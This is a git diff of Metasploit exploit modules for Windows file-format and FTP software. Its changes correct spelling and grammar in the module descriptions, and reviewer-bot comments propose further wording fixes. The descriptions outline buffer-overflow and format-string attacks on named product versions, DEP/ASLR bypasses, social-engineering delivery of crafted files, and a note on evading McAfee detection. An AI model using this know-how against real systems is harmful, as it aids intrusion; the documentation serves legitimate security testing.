--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set - in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. }, diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index a6191aa48b..fe3d7691d4 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - DBR file within a browser, since the DBR extention is registered to DeepBurner. + DBR file within a browser, since the DBR extension is registered to DeepBurner. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 0bd6a579a2..3b14db3dd2 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb 
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, - and then copy it on the stack without any proper bounds checking, which casues a - buffer overflow, and results arbitrary code execution under the context of the user. + and then copy it on the stack without any proper bounds checking, which causes a + buffer overflow, and results in arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7. diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 90f519af7f..5651182f92 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control - (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's + This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control + (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's Documentation ApplicationXtender 5.4. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index d03f35da23..0b9cf634b0 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the - function ERM_convert_to_correct_webpath handles user provided data in a insecure + function ERM_convert_to_correct_webpath handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index 9b66759feb..bf27a30630 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function - rf_report_error handles user provided data in a insecure way. It results in + rf_report_error handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 0df68d115f..fd32c41ba7 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HTML Help Workshop 4.74 - By creating a specially crafted hhp file, an an attacker may be able + By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index 27becb3a0b..f73c16b86e 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow', 'Description' => %q{ - This module embeds an exploit into an ucompressed map file (.h3m) for + This module embeds an exploit into an uncompressed map file (.h3m) for Heroes of Might and Magic III. Once the map is started in-game, a - buffer overflow occuring when loading object sprite names leads to + buffer overflow occurring when loading object sprite names leads to shellcode execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index d019940329..bcb783a8e6 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb 
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote saved RETURN address at offset 0x6c is overwritten by the data written past the buffer. To ensure we can perform arbitrary code execution we must we provide a valid pointer at - 0x74 which is used as a argument for the called function at 0x675751ED as a id file + 0x74 which is used as an argument for the called function at 0x675751ED as an id file extension parameter. Once the caller regains control we will reach our RETURN. The Ret - instruction will be used to pop the overwritten saved return address which was currupted. + instruction will be used to pop the overwritten saved return address which was corrupted. This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform. diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index b8c077826b..ca331f261f 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'IcoFX Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in version 2.1 - of IcoFX. The vulnerability exists while parsing .ICO files, where an specially + of IcoFX. The vulnerability exists while parsing .ICO files, where a specially crafted ICONDIR header providing an arbitrary long number of images in the file can be used to trigger the overflow when reading the ICONDIRENTRY structures. }, diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 69c7b6b75b..55d9ea8665 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb 
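Review bot: In the ibm_pcm_ws hunk the context line immediately above the changed lines still contains a duplicated word: "To ensure we can perform arbitrary code execution we must we provide a valid pointer at". Since the hunk already touches this sentence for the "a argument"/"a id" fixes, the same pass should drop the stray "we": `To ensure we can perform arbitrary code execution we must provide a valid pointer at`. The 'Description' string begins before the hunk.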
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. - By creating a specially crafted ipj file, an an attacker may be able + By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 25671a1821..3578da270b 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the - local system. However, if the victim machine is connected to a remote share ( - or something similiar), then it's also possible to execute arbitrary code. + local system. However, if the victim machine is connected to a remote share + (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine. diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 78737e1c96..90471410e1 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio. + PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 2a628a4b61..2bde64298e 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in MJM Core Player 2011 - When opening a malicious s3m file in this applications, a stack buffer overflow can be + When opening a malicious s3m file in this application, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. }, diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 499ada665d..9d13c5f2a5 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb 
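Review bot: The mjm_coreplayer2011_s3m hunk fixes "applications" but leaves the run-on on the context line just above it, where "This module exploits a stack buffer overflow in MJM Core Player 2011" runs straight into "When opening a malicious s3m file..." with no sentence break. The first line should end with a period: `This module exploits a stack buffer overflow in MJM Core Player 2011.`. The same missing-period pattern appears in the hhw_hhp_compiledfile_bof description ("HTML Help Workshop 4.74 By creating") earlier in this commit.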
@@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack-based buffer overflow found in the handling of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently - targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer. + targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer. The overflow is triggered when an unsuspecting victim opens a movie file first, followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also - be done from the console with the mplayer "-sub" option. + be done from the console with the MPlayer "-sub" option. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 03aab1aec2..e5c0dbbf67 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code - exection. + execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing. diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index 73db9b695e..d26da87e6a 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker - can get the control of the excution flow. This results aribrary code execution under + can get the control of the execution flow. This results in arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 0514c39ea8..00b0a02650 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- - based buffer overflow. This results aribrary code execution under the context of - user the user. + based buffer overflow. This results in arbitrary code execution under the context of + the user. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 5ba12c0a2b..4d8220ad71 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb 
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow', 'Description' => %q{ - This module exploits a stack oveflow in Microsoft Visual + This module exploits a stack overflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code. diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 4d9e5cef47..5b77143ba6 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to - represent the large vlaue, which ends up being 0, but it still gets pushed as a - dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a + represent the large value, which ends up being 0, but it still gets pushed as a + dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 7b73294ad7..2470394aa7 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb 
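Review bot: The sentence immediately after the corrected `stack overflow` line is still a fragment: `When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code.` has no main verb for the vbp file. Suggest `When a specially crafted vbp file containing a long reference line is opened, an attacker may be able to execute arbitrary code.`, which also makes the user-interaction precondition explicit for anyone reading the module description. This is text inside the Description `%q{}` string, so only displayed text changes. The enclosing `initialize`/`update_info` call starts and ends outside the hunk.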
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Orbit Downloader URL Unicode Conversion Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Orbit Downloader. - The vulnerability is due to Orbit converting an URL ascii string to unicode - in a insecure way with MultiByteToWideChar. + The vulnerability is due to Orbit converting a URL ascii string to unicode + in an insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the "File->Add Metalink..." option. }, diff --git a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb index 3f1268d324..1d628f94e8 100644 --- a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb +++ b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'PDF Shaper Buffer Overflow', 'Description' => %q{ PDF Shaper is prone to a security vulnerability when processing PDF files. - The vulnerability appear when we use Convert PDF to Image and use a specially - crafted PDF file. This module has been tested successfully on Win Xp, Win 7, + The vulnerability appears when we use Convert PDF to Image and use a specially + crafted PDF file. This module has been tested successfully on Win XP, Win 7, Win 8, Win 10. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index f9109ee076..41f46b13aa 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability - occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\". + occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\". This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index b4906989b6..90ac34302f 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. - NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a + NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a victim user to 'double click' the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP. }, diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 0c5cf632e8..806c8bc757 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb 
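Review bot: The changed line in total_video_player_ini_bof is still ungrammatical after the spacing fix: `occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\".` Suggest `occurs when opening a malformed Settings.ini file, e.g. from "C:\Program Files\Total Video Player\".`, which states the trigger (the file is read from the install directory) more clearly. The next context line, `Windows WinXp-Sp3-EN`, is also inconsistent with the `Win XP` casing this same commit applies in shaper_pdf_bof. Text inside `%q{}` only; the surrounding `update_info` hash starts and ends outside the hunk.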
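Review bot: In the visiwave_vwr_type hunk the new line `the application will register two file handles, VWS and VWR` fixes the apostrophe but keeps a misleading term: a "file handle" is an open-file object, whereas the sentence describes registering extensions so a double-click launches the application. Presumably file type associations are meant; suggest `the application will register two file extensions, VWS and VWR, which allows a`. This matters because the association is the delivery vector the description is documenting. Display text only; `update_info` begins and ends outside the hunk.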
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Win32AddConnection - function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are + function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 069d0c259f..dd0167afe8 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'VUPlayer CUE Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in VUPlayer <= 2.49. When - the application is used to open a specially crafted cue file, an buffer is overwritten allowing + This module exploits a stack based overflow in VUPlayer <= 2.49. When + the application is used to open a specially crafted cue file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index de294f91d3..de79640252 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb 
@@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, - where memmove is used with in a insecure way with user controlled data. + where memmove is used in an insecure way with user controlled data. - To exploit the vulnerability the attacker must convince the attacker to install the + To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index c6fff6e62f..c8e9bee1a8 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 - by generating an malicious file.) + by generating a malicious file. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index 730fb7d347..39b8b166cf 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Zinf. + PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index c0cf7abc37..d20f38a6dd 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability', 'Description' => %q{ This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially - crafted format string specifier as a username. The crafted username is sent to to the server to + crafted format string specifier as a username. The crafted username is sent to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. The SEH exit function is preferred so that the administrators are not left with an unhandled diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index 4815eac563..4be8f558fe 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb 
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote PASS command. This may allow a remote attacker to cause a buffer overflow, resulting in a denial of service or allow the execution of arbitrary code. - FreeFTPd must have an account set to authorization anonymous user account. + freeFTPd must have an account set to authorization anonymous user account. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 46528829a6..590eabf90b 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'FTPShell 5.1 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets - triggered when the ftp clients tries to process an overly response to a PWD command. - This will overwrite the saved EIP and structured exception handler. + triggered when the ftp client tries to process an overly long response to a PWD + command. This will overwrite the saved EIP and structured exception handler. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index b866d5d4a1..10d42e2050 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb 
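Review bot: The changed freeftpd_pass line only fixes capitalization and still does not parse: `freeFTPd must have an account set to authorization anonymous user account.` Presumably it means anonymous login has to be enabled on the target; something like `freeFTPd must be configured with an account that allows anonymous logins.` reads correctly, but confirm against the module's login handling, which is outside this hunk. Since this is the precondition an operator checks before firing the exploit, the wording should be unambiguous. Text inside `%q{}` only; `update_info` starts and ends outside the hunk.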
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX FTP server. - By sending an specially crafted FTP command containing format specifiers, an + By sending a specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 8b091a6b9a..62b21be60f 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous - credientials are enabled. + credentials are enabled. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index a34ac6221e..2ab92a7b0f 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. Social engineering of executing a specially crafted - ftp file by double click will result in connecting to our malcious + ftp file by double click will result in connecting to our malicious server and perform arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP. This vulnerability affects versions 3.3 and earlier. 
diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index a0544f319d..503b5f12cf 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the Seagull FTP client that gets - triggered when the ftp clients processes a response to a LIST command. If the + triggered when the ftp client processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler. }, diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index f7f5fa6061..d48f9e4942 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption', 'Description' => %q{ This module exploits an out-of-bounds array access in the Arcane Software - Vermillion FTP server. By sending an specially crafted FTP PORT command, + Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker 
